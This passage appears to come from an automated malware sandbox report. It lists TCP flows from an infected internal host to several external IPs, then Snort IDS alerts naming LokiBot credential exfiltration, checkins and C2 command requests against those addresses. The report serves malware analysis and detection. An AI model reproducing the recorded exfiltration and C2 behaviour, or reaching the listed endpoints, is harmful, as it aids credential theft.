                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
                  Source: global trafficTCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
                  Source: global trafficTCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
                  Source: global trafficTCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
                  Source: global trafficTCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
                  Source: global trafficTCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
                  Source: global trafficTCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
                  Source: global trafficTCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
                  Source: global trafficTCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
                  Source: global trafficTCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
                  Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49172
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49172
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49172

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49164 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49164 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49164 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49164 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49164 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49165 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49165 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49165 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49165 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49165 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49166 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49166 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49166 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49166 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49166 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49167 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49167 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49167 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49167 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49167 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49168 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49168 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49168 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49169 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49169 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49169 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49170 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49171 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49172 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49172 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49172 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49172 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49172 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49173 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49173 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49173 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49173 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49173 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49174 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49174 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49174 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49174 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49174 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49175 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49175 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49175 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49175 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49175 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49176 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49176 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49176 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49176 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49176 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49177 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49177 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49177 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49177 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49177 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49178 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49178 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49178 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49178 -> 188.114.96.3:80
